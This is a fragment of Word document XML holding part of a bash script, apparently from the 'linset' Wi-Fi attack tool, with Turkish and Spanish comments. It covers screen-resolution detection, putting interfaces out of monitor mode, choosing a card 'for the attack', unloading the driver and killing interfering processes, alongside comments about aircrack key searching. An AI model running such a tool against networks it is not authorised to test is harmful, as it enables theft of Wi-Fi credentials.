    <w:p w14:paraId="727739D9" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">TOPRIGHTBIG="-geometry 90x27-0+0"  # AIRCRACK ... ( BUSQUEDA DE KEYS ) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F336E3" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278D8273" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="7AD24366" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>detectedresolution=$(xdpyinfo | grep -A 3 "screen #0" | grep dimensions | tr -s " " | cut -d" " -f 3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F70A726" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>##  A) 1024x600</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC949D3" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>##  B) 1024x768</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78220894" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>##  C) 1280x768</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CB0094E" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>##  D) 1280x1024</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1861D2C6" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>##  E) 1600x1200</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BDFBCCF" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>case $detectedresolution in</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="515B4AF5" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>"1024x600" ) resA ;;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3657794A" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>"1024x768" ) resB ;;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D4CF05" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>"1280x768" ) resC ;;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0316C312" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>"1366x768" ) resC ;;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B462B42" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>"1280x1024" ) resD ;;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF652C6" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>"1600x1200" ) resE ;;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD277EF" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>"1366x768"  ) resF ;;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E4FC4FF" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">  * ) resA ;; ## fallback a una opción segura</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="454534D1" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>esac</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B080906" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E4EEF84" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="4547679B" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t># Kullanılacak arayüzleri seçin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F5E782D" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>function setinterface {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46355281" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="06AAF7E2" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t># Baslangicta tum monitorlari kapatir.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F4447C" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>KILLMONITOR=`iwconfig 2&gt;&amp;1 | grep Monitor | awk '{print $1}'`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F42968" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E544E2" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>for monkill in ${KILLMONITOR[@]}; do</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63908497" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>airmon-ng stop $monkill &gt;$linset_output_device</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A3B83AD" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo -n "$monkill, "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18375021" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D09B205" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="17FF2DDB" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t># Fiziksel ağ arayüzlerini listeleyen bir değişken oluşturun</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="338EDB57" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>readarray -t wirelessifaces &lt; &lt;(airmon-ng |grep "-" | cut -d- -f1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A81559A" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>INTERFACESNUMBER=`airmon-ng| grep -c "-"`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EBDA2E1" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">echo </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C1E5279" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>echo Arayuz sayisi $INTERFACESNUMBER</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="624EE9C3" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">echo </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="086AB6C9" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>echo Çözünürlüğü Otomatik Algıliyor...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F2E170" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>echo $detectedresolution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00BF43CF" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>echo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4498FF91" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C9138D3" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A3DCB66" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t># Kablosuz kart seçme</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB0CC3E" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>if [ "$INTERFACESNUMBER" -gt "0" ]; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C98253D" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D97046" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo "Bir arayüz seçin:"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B50279" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="562CBC04" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>i=0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D35BA0D" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="612F3AF8" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>for line in "${wirelessifaces[@]}"; do</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF62969" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>i=$(($i+1))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D9FA1DF" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>wirelessifaces[$i]=$line</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5011C43F" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo -e "$yesil""$i)"$yenidenrenklendir" $line"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A295BA" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C56EF89" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E305B59" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo -n "#? "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="102D337C" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>read line</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="311CE0D5" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>PREWIFI=$(echo ${wirelessifaces[$line]} | awk '{print $1}')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BEA1B7A" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F2CF7D5" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo Bu arayüzü şeçtiniz $PREWIFI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B2C580F" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3AFB56" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>if [ $(echo "$PREWIFI" | wc -m) -le 3 ]; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C8DB72" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>conditional_clear</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08979004" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="397C96A3" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>setinterface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BABB2FE" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04FEBAEE" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B55EB4B" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A3063E0" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D747B17" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>readarray -t wirelessifaces2 &lt; &lt;(airmon-ng |grep "-" | cut -d- -f1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A2FEB7" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="001298C3" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="647B21FE" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D3ED1B" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="773C187F" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo "Saldırı için bir arayüz seçin:"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5784AB5C" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17AEBF91" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>k=0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F7DAAB" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="308CA66B" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>for line in "${wirelessifaces2[@]}"; do</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED9179D" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>k=$(($k+1))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096B931E" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>wirelessifaces2[$k]=$line</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF79866" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo -e "$yesil""$k)"$yenidenrenklendir" $line"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B9E6B3A" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="078478C0" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="001907CA" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo -n "#? "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B4C8009" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>read line</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D8C731" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>PREWIFI2=$(echo ${wirelessifaces2[$line]} | awk '{print $1}')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="375E75D2" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DDADD05" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo Bu arayüzü şeçtiniz $PREWIFI2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="105DD998" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B714859" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>if [ $(echo "$PREWIFI2" | wc -m) -le 3 ]; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F17E03" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>conditional_clear</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="227C0059" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A262636" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>setinterface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74948ADB" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="019FD7F7" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C2CE17D" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D3728C" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ADE26B9" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="57805415" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="71269167" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA50C35" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>readarray -t softwaremolesto &lt; &lt;(airmon-ng check $PREWIFI | tail -n +8 | grep -v "on interface" | awk '{ print $2 }')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D24DC2" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>WIFIDRIVER=$(airmon-ng | grep "$PREWIFI" | awk '{print($(NF-2))}')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03FDD2BD" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>rmmod -f "$WIFIDRIVER" &amp;&gt;$linset_output_device 2&gt;&amp;1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B8A462C" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B2D196" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>for molesto in "${softwaremolesto[@]}"; do</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="611F4BE5" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>killall "$molesto" &amp;&gt;$linset_output_device</w:t>
      </w:r>
